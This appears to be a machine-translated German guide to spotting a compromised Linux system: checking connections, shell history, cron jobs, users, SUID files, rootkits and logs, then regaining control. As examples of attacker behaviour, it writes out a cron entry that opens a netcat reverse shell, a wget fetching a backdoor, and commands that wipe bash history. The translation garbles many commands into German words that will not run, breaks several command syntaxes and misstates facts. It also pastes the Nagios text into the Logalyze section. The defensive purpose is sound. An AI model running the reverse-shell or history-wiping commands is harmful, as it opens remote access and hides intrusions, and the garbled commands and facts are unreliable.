Sicherheit

So stellen Sie fest, ob ein Linux-System kompromittiert ist

So stellen Sie fest, ob ein Linux-System kompromittiert ist
Es gibt viele Gründe, warum sich ein Hacker in Ihr System einschleicht und Ihnen ernsthafte Probleme bereitet. Vor Jahren vielleicht, um seine Fähigkeiten unter Beweis zu stellen, aber heutzutage können die Absichten hinter solchen Aktivitäten viel komplizierter sein und weitreichendere Konsequenzen für das Opfer haben. Das mag offensichtlich klingen, aber nur weil „alles in Ordnung scheint“, heißt das nicht, dass alles in Ordnung ist. Hacker könnten in Ihr System eindringen, ohne Sie darüber zu informieren, und es mit Malware infizieren, um die volle Kontrolle zu übernehmen und sogar für seitliche Bewegungen zwischen Systemen. Die Malware kann im System versteckt werden und dient Hackern als Hintertür oder als Command & Control-System, um bösartige Aktivitäten auf Ihrem System auszuführen.Es ist besser auf Nummer sicher zu gehen. Sie bemerken vielleicht nicht sofort, dass Ihr System gehackt wurde, aber es gibt einige Möglichkeiten, wie Sie feststellen können, ob Ihr System kompromittiert ist. In diesem Artikel erfahren Sie, wie Sie feststellen können, ob Ihr Linux das System von einer nicht autorisierten Person kompromittiert wurde oder ein Bot sich bei Ihrem System anmeldet, um böswillige Aktivitäten auszuführen.

Netstat

Netstat ist ein wichtiges Befehlszeilen-Dienstprogramm für TCP/IP-Netzwerke, das Informationen und Statistiken zu verwendeten Protokollen und aktiven Netzwerkverbindungen bereitstellt.

Wir werden verwenden netstat auf einem Beispiel-Opfercomputer, um in den aktiven Netzwerkverbindungen mit dem folgenden Befehl nach verdächtigen Dingen zu suchen:

[email protected]:~$ netstat -antp

Hier sehen wir alle derzeit aktiven Verbindungen. Jetzt suchen wir nach einem Verbindung, die nicht da sein sollte.

Hier ist sie, eine aktive Verbindung auf PORT 44999 (ein Port, der nicht geöffnet sein sollte).Wir können andere Details über die Verbindung sehen, wie z PID, und der Programmname in der letzten Spalte. In diesem Fall ist die PID ist 1555 und die bösartige Nutzlast, die es ausführt, ist die ./Schale.Elf Datei.

Ein weiterer Befehl, um nach den Ports zu suchen, die derzeit auf Ihrem System lauschen und aktiv sind, lautet wie folgt:

[email protected]:~$ netstat -la

Das ist eine ziemlich chaotische Ausgabe. Um die lauschenden und hergestellten Verbindungen herauszufiltern, verwenden wir den folgenden Befehl:

[email protected]:~$ netstat -la | grep „HÖREN“ „GERICHTET“

Dadurch erhalten Sie nur die Ergebnisse, die für Sie von Bedeutung sind, sodass Sie diese Ergebnisse leichter sortieren können. Wir können eine aktive Verbindung sehen auf Port 44999 in den obigen Ergebnissen.

Nachdem Sie den bösartigen Prozess erkannt haben, können Sie den Prozess mit den folgenden Befehlen beenden. Wir werden dies beachten PID des Prozesses mit dem Befehl netstat und beenden Sie den Prozess mit dem folgenden Befehl:

[email protected]:~$ kill 1555

~.Bash-Geschichte

Linux zeichnet auf, welche Benutzer sich mit welcher IP, wann und wie lange am System angemeldet haben.

Sie können auf diese Informationen zugreifen mit dem letzte Befehl. Die Ausgabe dieses Befehls würde wie folgt aussehen:

[email protected]:~$ zuletzt

Die Ausgabe zeigt den Benutzernamen in der ersten Spalte, das Terminal in der zweiten, die Quelladresse in der dritten, die Anmeldezeit in der vierten Spalte und die gesamte protokollierte Sitzungszeit in der letzten Spalte. In diesem Fall sind die Benutzer usman und ubuntu sind noch eingeloggt. Wenn Sie eine Sitzung sehen, die nicht autorisiert ist oder bösartig aussieht, lesen Sie den letzten Abschnitt dieses Artikels.

Der Protokollierungsverlauf wird gespeichert in stored ~.Bash-Geschichte Datei. So kann die Historie einfach durch Löschen der entfernt werden .Bash-Geschichte Datei. Diese Aktion wird häufig von Angreifern ausgeführt, um ihre Spuren zu verwischen.

[email protected]:~$ Katze .bash_history

Dieser Befehl zeigt die auf Ihrem System ausgeführten Befehle an, wobei der letzte ausgeführte Befehl am Ende der Liste steht.

Die Historie kann über den folgenden Befehl gelöscht werden:

[email protected]:~$ Verlauf -c

Dieser Befehl löscht nur den Verlauf von dem Terminal, das Sie gerade verwenden. Es gibt also einen korrekteren Weg, dies zu tun:

[email protected]:~$ cat /dev/null > ~/.bash_history

Dadurch wird der Inhalt des Verlaufs gelöscht, die Datei bleibt jedoch erhalten. Wenn Sie also nach dem Ausführen des letzte Befehl, das ist überhaupt kein gutes Zeichen. Dies weist darauf hin, dass Ihr System möglicherweise kompromittiert wurde und der Angreifer wahrscheinlich den Verlauf gelöscht hat.

Wenn Sie einen böswilligen Benutzer oder eine böswillige IP vermuten, melden Sie sich als dieser Benutzer an und führen Sie den Befehl aus Geschichte, wie folgt:

[email protected]:~$ su
[email protected]:~$ Verlauf

Dieser Befehl zeigt den Befehlsverlauf durch Lesen der Datei an .Bash-Geschichte in dem /Zuhause Ordner dieses Benutzers. Suchen Sie sorgfältig nach wget, Locken, oder netcat Befehle, falls der Angreifer diese Befehle verwendet hat, um Dateien zu übertragen oder Tools aus Repositorys wie Krypto-Miner oder Spam-Bots zu installieren.

Schauen Sie sich das folgende Beispiel an:

Oben sehen Sie den Befehl wget https://github.com/sajith/mod-rootme.In diesem Befehl hat der Hacker versucht, mit out auf eine Datei außerhalb des Repo zuzugreifen wget um eine Hintertür namens „mod-root me“ herunterzuladen und auf Ihrem System zu installieren. Dieser Befehl in der Historie bedeutet, dass das System kompromittiert wurde und von einem Angreifer durch die Hintertür manipuliert wurde.

Denken Sie daran, dass diese Datei leicht ausgeworfen oder ihre Substanz hergestellt werden kann. Die von diesem Befehl gelieferten Daten dürfen nicht als definitive Realität angesehen werden. Falls der Angreifer jedoch einen „schlechten“ Befehl ausgeführt und es versäumt hat, die Historie zu evakuieren, wird es dort sein.

Zeitgesteuerte Aufgaben

Cron-Jobs können als wichtiges Werkzeug dienen, wenn sie so konfiguriert sind, dass sie eine Reverse-Shell auf dem Angreifer-Rechner einrichten. Das Bearbeiten von Cron-Jobs ist eine wichtige Fähigkeit, ebenso wie das Wissen, wie man sie anzeigt.

Um die Cron-Jobs anzuzeigen, die für den aktuellen Benutzer ausgeführt werden, verwenden wir den folgenden Befehl:

[email protected]:~$ crontab -l

Um die Cron-Jobs anzuzeigen, die für einen anderen Benutzer (in diesem Fall Ubuntu) ausgeführt werden, verwenden wir den folgenden Befehl:

[email protected]:~$ crontab -u ubuntu -l

Um tägliche, stündliche, wöchentliche und monatliche Cron-Jobs anzuzeigen, verwenden wir die folgenden Befehle:

Tägliche Cron-Jobs:

[email protected]:~$ ls -la /etc/cron.Täglich

Stündliche Cron-Jobs:

[email protected]:~$ ls -la /etc/cron.stündlich

Wöchentliche Cron-Jobs:

[email protected]:~$ ls -la /etc/cron.wöchentlich

Nehmen Sie ein Beispiel:

Der Angreifer kann einen Cron-Job einsetzen /etc/crontab der einen bösartigen Befehl 10 Minuten nach jeder Stunde ausführt. Der Angreifer kann auch einen bösartigen Dienst oder eine Reverse-Shell-Backdoor ausführen über netcat oder ein anderes Dienstprogramm. Wenn Sie den Befehl ausführen $~ crontab -l, Sie sehen einen Cron-Job unter:

[email protected]:~$ crontab -l
CT=$(crontab -l)
CT=$CT$'\n10 * * * * nc -e /bin/bash 192.168.8.131 44999'
printf "$CT" | crontab -
ps aux

Um ordnungsgemäß zu überprüfen, ob Ihr System kompromittiert wurde, ist es auch wichtig, laufende Prozesse anzuzeigen. Es gibt Fälle, in denen einige nicht autorisierte Prozesse nicht genug CPU-Auslastung verbrauchen, um in der Liste aufgeführt zu werden oben Befehl. Hier werden wir die verwenden ps Befehl um alle aktuell laufenden Prozesse anzuzeigen.

[email protected]:~$ ps auxf

Die erste Spalte zeigt den Benutzer, die zweite Spalte zeigt eine eindeutige Prozess-ID und die CPU- und Speichernutzung wird in den nächsten Spalten angezeigt shown.

Diese Tabelle wird Ihnen die meisten Informationen liefern. Sie sollten jeden laufenden Prozess überprüfen, um nach Besonderheiten zu suchen, um zu wissen, ob das System kompromittiert ist oder nicht. Falls Sie etwas Verdächtiges finden, googeln Sie es oder führen Sie es mit dem lsof Befehl, wie oben gezeigt. Das ist eine gute Angewohnheit zu laufen ps Befehle auf Ihrem Server und es erhöht Ihre Chancen, verdächtige oder nicht alltägliche Dinge zu finden.

/etc/passwd

Das /etc/passwd Datei verfolgt jeden Benutzer im System. Dies ist eine durch Doppelpunkte getrennte Datei, die Informationen wie den Benutzernamen, die Benutzer-ID, das verschlüsselte Passwort, die GroupID (GID), den vollständigen Namen des Benutzers, das Home-Verzeichnis des Benutzers und die Login-Shell enthält.

Wenn sich ein Angreifer in Ihr System hackt, besteht die Möglichkeit, dass er oder sie weitere Benutzer erstellt, die Dinge getrennt hält oder eine Hintertür in Ihrem System erstellt, um diese Hintertür wieder zu verwenden. Während Sie überprüfen, ob Ihr System kompromittiert wurde, sollten Sie auch jeden Benutzer in der Datei /etc/passwd überprüfen. Geben Sie dazu den folgenden Befehl ein:

[email protected]:~$ cat etc/passwd

Dieser Befehl gibt Ihnen eine Ausgabe ähnlich der folgenden:

gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
usman:x:1000:1000:usman:/home/usman:/bin/bash
postgres:x:122:128:PostgreSQL-Administrator,,,:/var/lib/postgresql:/bin/bash
debian-tor:x:123:129::/var/lib/tor:/bin/false
ubuntu:x:1001:1001:ubuntu,,,:/home/ubuntu:/bin/bash
lightdm:x:125:132:Light Display Manager:/var/lib/lightdm:/bin/false
Debian-gdm:x:124:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
anonym:x:1002:1002:,,,:/home/anonym:/bin/bash

Jetzt möchten Sie nach jedem Benutzer suchen, den Sie nicht kennen. In diesem Beispiel sehen Sie einen Benutzer in der Datei mit dem Namen „anonym“.” Ein weiterer wichtiger Punkt ist, dass, wenn der Angreifer einen Benutzer erstellt hat, mit dem er sich wieder anmelden kann, dem Benutzer auch eine „/bin/bash“-Shell zugewiesen wird. Sie können Ihre Suche also eingrenzen, indem Sie die folgende Ausgabe erfassen:

[email protected]:~$ cat /etc/passwd | grep -i "/bin/bash"
usman:x:1000:1000:usman:/home/usman:/bin/bash
postgres:x:122:128:PostgreSQL-Administrator,,,:/var/lib/postgresql:/bin/bash
ubuntu:x:1001:1001:ubuntu,,,:/home/ubuntu:/bin/bash
anonym:x:1002:1002:,,,:/home/anonym:/bin/bash

Sie können weitere „Bash-Magie“ ausführen, um Ihre Ausgabe zu verfeinern.

[email protected]:~$ cat /etc/passwd | grep -i "/bin/bash" | Schnitt -d ":" -f 1
usman
postgres
ubuntu
anonym

Finden

Zeitbasierte Suchen sind nützlich für eine schnelle Triage. Der Benutzer kann auch Zeitstempel für Dateiänderungen ändern modify. Um die Zuverlässigkeit zu verbessern, schließen Sie ctime in die Kriterien ein, da es viel schwieriger zu manipulieren ist, da Änderungen einiger Level-Dateien erforderlich sind.

Sie können den folgenden Befehl verwenden, um Dateien zu finden, die in den letzten 5 Tagen erstellt und geändert wurden:

[email protected]:~$ find / -mtime -o -ctime -5

Um alle SUID-Dateien zu finden, die dem Root gehören, und um zu überprüfen, ob unerwartete Einträge in den Listen vorhanden sind, verwenden wir den folgenden Befehl:

[email protected]:~$ find / -perm -4000 -user root -type f

Um alle SGID-Dateien (set user ID) zu finden, die dem Root gehören, und um zu überprüfen, ob unerwartete Einträge in den Listen vorhanden sind, verwenden wir den folgenden Befehl:

[email protected]:~$ find / -perm -6000 -type f

Chkrootkit

Rootkits gehören zu den schlimmsten Dingen, die einem System passieren können, und sind einer der gefährlichsten Angriffe, gefährlicher als Malware und Viren, sowohl hinsichtlich der Schäden, die sie dem System zufügen, als auch der Schwierigkeit, sie zu finden und zu erkennen detecting.

Sie sind so konzipiert, dass sie verborgen bleiben und bösartige Dinge tun, wie zum Beispiel Kreditkarten- und Online-Banking-Informationen zu stehlen. Rootkits Geben Sie Cyberkriminellen die Möglichkeit, Ihr Computersystem zu kontrollieren. Rootkits helfen dem Angreifer auch, Ihre Tastatureingaben zu überwachen und Ihre Antivirensoftware zu deaktivieren, wodurch es noch einfacher wird, Ihre privaten Informationen zu stehlen.

Diese Art von Malware kann lange Zeit auf Ihrem System verbleiben, ohne dass der Benutzer es bemerkt, und kann ernsthaften Schaden anrichten. Sobald die Rootkit erkannt wird, gibt es keine andere Möglichkeit, als das gesamte System neu zu installieren. Manchmal können diese Angriffe sogar zu Hardwarefehlern führen.

Glücklicherweise gibt es einige Tools, die bei der Erkennung helfen können Rootkits auf Linux-Systemen wie Lynis, Clam AV oder LMD (Linux Malware Detect). Sie können Ihr System auf bekannte Rootkits mit den Befehlen unten.

Zuerst installieren Chkrootkit über folgenden Befehl:

[email protected]:~$ sudo apt install chkrootkit

Dies installiert die Chkrootkit Werkzeug. Sie können dieses Tool verwenden, um über den folgenden Befehl nach Rootkits zu suchen:

[email protected]:~$ sudo chkrootkit

Das Chkrootkit-Paket besteht aus einem Shell-Skript, das System-Binärdateien auf Rootkit-Modifikationen überprüft, sowie mehreren Programmen, die auf verschiedene Sicherheitsprobleme prüfen. Im obigen Fall hat das Paket auf dem System nach Anzeichen von Rootkit gesucht und keine gefunden. Nun, das ist ein gutes Zeichen!

Linux-Protokolle

Linux-Protokolle bieten einen Zeitplan für Ereignisse im Linux-Arbeitsframework und in den Anwendungen und sind ein wichtiges Untersuchungsinstrument, wenn Probleme auftreten. Die Hauptaufgabe, die ein Administrator ausführen muss, wenn er oder sie feststellt, dass das System kompromittiert ist, sollte darin bestehen, alle Protokolldatensätze zu analysieren.

Bei expliziten Problemen der Arbeitsbereichsanwendung werden Protokollaufzeichnungen mit verschiedenen Bereichen in Verbindung gehalten. Chrome erstellt beispielsweise Absturzberichte an '~/.chrome/Absturzberichte"), wenn eine Arbeitsbereichsanwendung Protokolle erstellt, die vom Ingenieur abhängig sind, und zeigt, ob die Anwendung benutzerdefinierte Protokollanordnungen berücksichtigt. Aufzeichnungen sind im/var/log Verzeichnis. Es gibt Linux-Logs für alles: Framework, Portion, Bundle-Chefs, Boot-Formen, Xorg, Apache und MySQL. In diesem Artikel konzentriert sich das Thema explizit auf Linux-Framework-Logs.

Sie können zu diesem Katalog wechseln, indem Sie die CD-Bestellung verwenden. Sie sollten über Root-Berechtigungen verfügen, um Protokolldateien anzuzeigen oder zu ändern.

[email protected]:~$ cd /var/log

Anweisungen zum Anzeigen von Linux-Protokollen

Verwenden Sie die folgenden Befehle, um die erforderlichen Protokolldokumente anzuzeigen.

Linux-Logs können mit dem Befehl eingesehen werden cd /var/log, zu diesem Zeitpunkt, indem Sie die Bestellung zusammenstellen, um die Protokolle zu sehen, die unter diesem Katalog abgelegt werden. Eines der bedeutendsten Protokolle ist das syslog, die viele wichtige Protokolle protokolliert.

ubuntu@ubuntu: cat syslog

Um die Ausgabe zu bereinigen, verwenden wir das „Weniger" Befehl.

ubuntu@ubuntu:  cat syslog | Weniger

Geben Sie den Befehl ein var/log/syslog um einiges zu sehen  unter dem syslog-Datei. Die Konzentration auf ein bestimmtes Thema wird einige Zeit in Anspruch nehmen, da diese Aufzeichnung normalerweise lang sein wird. Drücken Sie Umschalt+G, um im Datensatz nach unten zu ENDE zu scrollen, gekennzeichnet durch „ENDE“.”

Sie können die Protokolle ebenfalls mit dmesg einsehen, das die Teilringunterstützung ausdruckt. Diese Funktion druckt alles aus und schickt Sie so weit wie möglich am Dokument entlang. Ab diesem Zeitpunkt können Sie die Bestellung verwenden dmesg | Weniger den Ertrag durchsehen. Falls Sie die Protokolle für den angegebenen Benutzer anzeigen möchten, müssen Sie den folgenden Befehl ausführen:

dmesg - Einrichtung=Benutzer

Zusammenfassend können Sie die Protokolldokumente mithilfe der Tailorder anzeigen. Es ist ein kleines, aber nützliches Dienstprogramm, das man verwenden kann, da es verwendet wird, um den letzten Teil der Protokolle anzuzeigen, wo das Problem am wahrscheinlichsten aufgetreten ist. Sie können auch die Anzahl der letzten Bytes oder Zeilen angeben, die im tail-Befehl angezeigt werden sollen. Verwenden Sie dazu den Befehl Schwanz /var/log/syslog. Es gibt viele Möglichkeiten, Protokolle anzuzeigen.

Geben Sie für eine bestimmte Anzahl von Zeilen (das Modell berücksichtigt die letzten fünf Zeilen) den folgenden Befehl ein:

[email protected]:~$ tail -f -n 5 /var/log/syslog

Dadurch werden die letzten 5 Zeilen gedruckt. Wenn eine andere Linie kommt, wird die erstere evakuiert. Um die Tail-Reihenfolge zu verlassen, drücken Sie Strg+X.

Wichtige Linux-Protokolle

Die primären vier Linux-Logs umfassen:

  1. Anwendungsprotokolle
  2. Ereignisprotokolle
  3. Serviceprotokolle
  4. Systemprotokolle
ubuntu@ubuntu:  cat syslog | Weniger
  • /var/log/syslog oder /var/log/messages: allgemeine Meldungen, genauso wie rahmenbezogene Daten. Dieses Protokoll speichert alle Aktionsinformationen über das weltweite Framework.
ubuntu@ubuntu:  Katzenauth.log | Weniger
  • /var/log/auth.Log oder /var/log/secure: Verifizierungsprotokolle speichern, einschließlich effektiver und fehlgeschlagener Anmeldungen und Validierungsstrategien. Debian- und Ubuntu-Nutzung /var/log/auth.Log um Anmeldeversuche zu speichern, während Redhat und CentOS verwendenOS /var/log/secure um Authentifizierungsprotokolle zu speichern.
ubuntu@ubuntu:  Katzenstiefel.log | Weniger
  • /var/log/boot.Log: enthält Informationen zum Booten und Meldungen beim Start.
ubuntu@ubuntu:  Katzen-Maillog | Weniger
  • /var/log/maillog oder /var/log/mail.Log: speichert alle mit Mailservern identifizierten Protokolle; wertvoll, wenn Sie Daten zu Postfix, smtpd oder anderen E-Mail-bezogenen Verwaltungen benötigen, die auf Ihrem Server ausgeführt werden.
ubuntu@ubuntu:  Katzenkern | Weniger
  • /var/log/kern: enthält Informationen zu Kernel-Logs. Dieses Protokoll ist wichtig, um benutzerdefinierte Portionen zu untersuchen.
ubuntu@ubuntu:  cat dmesg | Weniger
  • /var/log/dmesg: enthält Nachrichten, die Gadget-Treiber identifizieren. Die Reihenfolge dmesg kann verwendet werden, um Nachrichten in diesem Datensatz anzuzeigen.
ubuntu@ubuntu:  cat-Faillog | Weniger
  • /var/log/faillog: enthält Daten zu allen fehlgeschlagenen Anmeldeversuchen, wertvoll, um Informationen über versuchte Sicherheitseindringungen zu sammeln; zum Beispiel diejenigen, die Login-Zertifizierungen hacken wollen, genauso wie Angriffe auf Tierkräfte.
ubuntu@ubuntu:  cat cron | Weniger
  • /var/log/cron: speichert alle Cron-bezogenen Nachrichten; Cron-Beschäftigungen zum Beispiel oder wenn der Cron-Daemon eine Berufung gestartet hat, entsprechende Enttäuschungsnachrichten und so weiter.
ubuntu@ubuntu:  Katze lecker.log | Weniger
  • /var/log/yum.Log: Wenn Sie Bundles mit der Yum-Reihenfolge einführen, speichert dieses Protokoll alle zugehörigen Daten, was bei der Entscheidung hilfreich sein kann, ob ein Bundle und alle Segmente effektiv eingeführt wurden.
ubuntu@ubuntu:  Katze httpd | Weniger
  • /var/log/httpd/ oder /var/log/apache2: Diese beiden Verzeichnisse werden verwendet, um alle Arten von Protokollen für einen Apache HTTP-Server zu speichern, einschließlich Zugriffsprotokolle und Fehlerprotokolle. Die Datei error_log enthält alle vom http-Server empfangenen fehlerhaften Anfragen. Diese Fehler beinhalten Gedächtnisprobleme und andere Fehler im Zusammenhang mit dem Framework framework. Das access_log enthält eine Aufzeichnung aller über HTTP empfangenen Anfragen.
ubuntu@ubuntu:  cat mysqld.log | Weniger
  • /var/log/mysqld.Log oder/var/log/mysql.Log : das MySQL-Protokolldokument, das alle Fehler-, Debug- und Erfolgsmeldungen protokolliert. Dies ist ein weiteres Ereignis, bei dem das Framework an die Registrierung verweist; RedHat, CentOS, Fedora und andere RedHat-basierte Frameworks verwenden/var/log/mysqld.log, während Debian/Ubuntu die Datei/var/log/mysql.Log-Katalog.

Tools zum Anzeigen von Linux-Protokollen

Heutzutage sind viele Open-Source-Log-Tracker und -Untersuchungsgeräte verfügbar, die die Auswahl der richtigen Assets für Aktionsprotokolle einfacher machen, als Sie vielleicht vermuten. Die kostenlosen und Open-Source-Protokollprüfer können auf jedem System arbeiten, um die Arbeit zu erledigen. Hier sind fünf der besten, die ich in der Vergangenheit verwendet habe, in keiner bestimmten Reihenfolge.

  • GRAULOG

Graylog wurde 2011 in Deutschland gestartet und wird derzeit entweder als Open-Source-Gerät oder als Geschäftsvereinbarung angeboten. Graylog soll ein zusammengeführtes Log-the-Board-Framework sein, das Informationsströme von verschiedenen Servern oder Endpunkten empfängt und Ihnen ermöglicht, diese Daten schnell zu durchsuchen oder aufzuschlüsseln.

Graylog hat sich aufgrund seiner Einfachheit und Vielseitigkeit eine positive Berühmtheit unter den Framework-Köpfen erarbeitet. Die meisten Web-Ventures beginnen wenig, können sich aber exponentiell entwickeln. Graylog kann Stacks über ein System von Backend-Servern anpassen und täglich einige Terabyte an Protokollinformationen verarbeiten.

IT-Vorstände werden das Frontend der GrayLog-Schnittstelle als einfach zu bedienen und stark in seiner Nützlichkeit ansehen. Graylog arbeitet um die Idee von Dashboards herum, die es Benutzern ermöglichen, die Art von Messungen oder Informationsquellen auszuwählen, die sie für wichtig halten, und Steigungen nach einiger Zeit schnell zu beobachten.

Wenn eine Sicherheits- oder Ausführungsepisode auftritt, müssen IT-Vorstände die Möglichkeit haben, die Manifestationen so schnell wie vernünftigerweise erwartet zu einem zugrunde liegenden Treiber zu verfolgen. Die Suchfunktion von Graylog macht diese Aufgabe einfach. Dieses Tool hat sich bei der Anpassung an interne Fehler bewährt, die mehrsträngige Unternehmungen durchführen können, damit Sie einige potenzielle Gefahren gemeinsam beseitigen können.

  • NAGIOS

1999 von einem einzigen Entwickler gegründet, hat sich Nagios seitdem zu einem der solidesten Open-Source-Instrumente für die Überwachung von Log-Informationen entwickelt. Die aktuelle Version von Nagios kann auf Servern implementiert werden, auf denen jedes Betriebssystem (Linux, Windows usw.) ausgeführt wird.).

Das wesentliche Element von Nagios ist ein Log-Server, der die Informationssammlung rationalisiert und Daten schrittweise für Framework-Führungskräfte verfügbar macht. Der Motor des Nagios-Logservers fängt Informationen nach und nach auf und speist sie in ein bahnbrechendes Suchinstrument ein. Die Integration mit einem anderen Endpunkt oder einer anderen Anwendung ist eine einfache Belohnung für diesen inhärenten Anordnungsassistenten.

Nagios wird häufig in Verbänden eingesetzt, die die Sicherheit ihrer Nachbarschaften überprüfen müssen und eine Reihe von systembezogenen Anlässen überprüfen können, um die Übermittlung von Warnungen zu erleichtern. Nagios kann so programmiert werden, dass es bestimmte Aufgaben ausführt, wenn eine bestimmte Bedingung erfüllt ist, wodurch Benutzer Probleme erkennen können, noch bevor die Bedürfnisse eines Menschen berücksichtigt werden.

Als wichtiger Aspekt der Systembewertung kanalisiert Nagios Protokollinformationen in Abhängigkeit von dem geografischen Gebiet, in dem es beginnt. Vollständige Dashboards mit Mapping-Innovation können implementiert werden, um das Streaming des Web-Traffics zu sehen.

  • LOGALYZE

Logalyze stellt Open-Source-Tools für Framework-Direktoren oder Systemadministratoren und Sicherheitsspezialisten her, um sie bei der Überwachung der Serverprotokolle zu unterstützen und ihnen zu ermöglichen, sich auf die Umwandlung der Protokolle in wertvolle Informationen zu konzentrieren. Das Wesentliche an diesem Tool ist, dass es als kostenloser Download für den privaten oder geschäftlichen Gebrauch zugänglich ist.

Das wesentliche Element von Nagios ist ein Log-Server, der die Informationssammlung rationalisiert und Daten schrittweise für Framework-Führungskräfte verfügbar macht. Der Motor des Nagios-Logservers fängt Informationen nach und nach auf und speist sie in ein bahnbrechendes Suchinstrument ein. Die Integration mit einem anderen Endpunkt oder einer anderen Anwendung ist eine einfache Belohnung für diesen inhärenten Anordnungsassistenten.

Nagios wird häufig in Verbänden eingesetzt, die die Sicherheit ihrer Nachbarschaften überprüfen müssen und eine Reihe von systembezogenen Anlässen überprüfen können, um die Übermittlung von Warnungen zu erleichtern. Nagios kann so programmiert werden, dass es bestimmte Aufgaben ausführt, wenn eine bestimmte Bedingung erfüllt ist, wodurch Benutzer Probleme erkennen können, noch bevor die Bedürfnisse eines Menschen berücksichtigt werden.

Als wichtiger Aspekt der Systembewertung kanalisiert Nagios Protokollinformationen in Abhängigkeit von dem geografischen Gebiet, in dem es beginnt. Vollständige Dashboards mit Mapping-Innovation können implementiert werden, um das Streaming des Web-Traffics zu sehen.

Was sollten Sie tun, wenn Sie kompromittiert wurden?

Hauptsache keine Panik, vor allem wenn der Unbefugte gerade angemeldet ist. Sie sollten die Möglichkeit haben, die Kontrolle über die Maschine wieder zu übernehmen, bevor die andere Person weiß, dass Sie davon wissen. Falls sie wissen, dass Sie sich ihrer Anwesenheit bewusst sind, kann der Angreifer Sie von Ihrem Server fernhalten und damit beginnen, Ihr System zu zerstören. Wenn Sie nicht so technisch sind, müssen Sie nur den gesamten Server sofort herunterfahren. Sie können den Server über die folgenden Befehle herunterfahren:

[email protected]:~$ Shutdown -h jetzt

Oder

[email protected]:~$ systemctl poweroff

Eine andere Möglichkeit, dies zu tun, besteht darin, sich in das Control Panel Ihres Hosting-Providers einzuloggen und es von dort aus zu schließen. Sobald der Server ausgeschaltet ist, können Sie an den erforderlichen Firewall-Regeln arbeiten und sich jederzeit an andere wenden, um Hilfe zu erhalten.

Falls Sie sich sicherer fühlen und Ihr Hosting-Provider über eine vorgelagerte Firewall verfügt, erstellen und aktivieren Sie die folgenden zwei Regeln:

  • Erlaube SSH-Datenverkehr nur von deiner IP-Adresse.
  • Blockieren Sie alles andere, nicht nur SSH, sondern jedes Protokoll, das auf jedem Port ausgeführt wird.

Um nach aktiven SSH-Sitzungen zu suchen, verwenden Sie den folgenden Befehl:

[email protected]:~$ ss | grep ssh

Verwenden Sie den folgenden Befehl, um ihre SSH-Sitzung zu beenden:

[email protected]:~$ kill

Dadurch wird ihre SSH-Sitzung beendet und Sie erhalten Zugriff auf den Server. Falls Sie keinen Zugriff auf eine vorgelagerte Firewall haben, müssen Sie die Firewall-Regeln auf dem Server selbst erstellen und aktivieren. Wenn die Firewall-Regeln eingerichtet sind, beenden Sie die SSH-Sitzung des nicht autorisierten Benutzers mit dem Befehl „kill“.

Eine letzte Technik, sofern verfügbar, melden Sie sich über eine Out-of-Band-Verbindung beim Server an, z. B. eine serielle Konsole. Stoppen Sie alle Netzwerke über den folgenden Befehl:

[email protected]:~$  systemctl stop network.Bedienung

Dadurch wird verhindert, dass jedes System zu Ihnen gelangt, sodass Sie die Firewall-Steuerelemente jetzt in Ihrer eigenen Zeit aktivieren können.

Sobald Sie die Kontrolle über den Server wiedererlangt haben, vertrauen Sie ihm nicht so leicht. Versuchen Sie nicht, Dinge zu reparieren und wiederzuverwenden. Was kaputt ist, kann nicht repariert werden. Sie würden nie wissen, was ein Angreifer tun könnte, und sollten daher nie sicher sein, ob der Server sicher ist. Die Neuinstallation sollte also der letzte Schritt sein.

So entwickeln Sie ein Spiel unter Linux
Vor einem Jahrzehnt hätten nicht viele Linux-Benutzer vorhergesagt, dass ihr Lieblingsbetriebssystem eines Tages eine beliebte Spieleplattform für kom...
Open-Source-Ports kommerzieller Spiele-Engines
Kostenlose, quelloffene und plattformübergreifende Spiel-Engine-Nachbildungen können verwendet werden, um sowohl alte als auch einige der relativ neue...
Beste Befehlszeilenspiele für Linux
Die Befehlszeile ist nicht nur Ihr größter Verbündeter bei der Verwendung von Linux – sie kann auch eine Quelle der Unterhaltung sein, da Sie damit vi...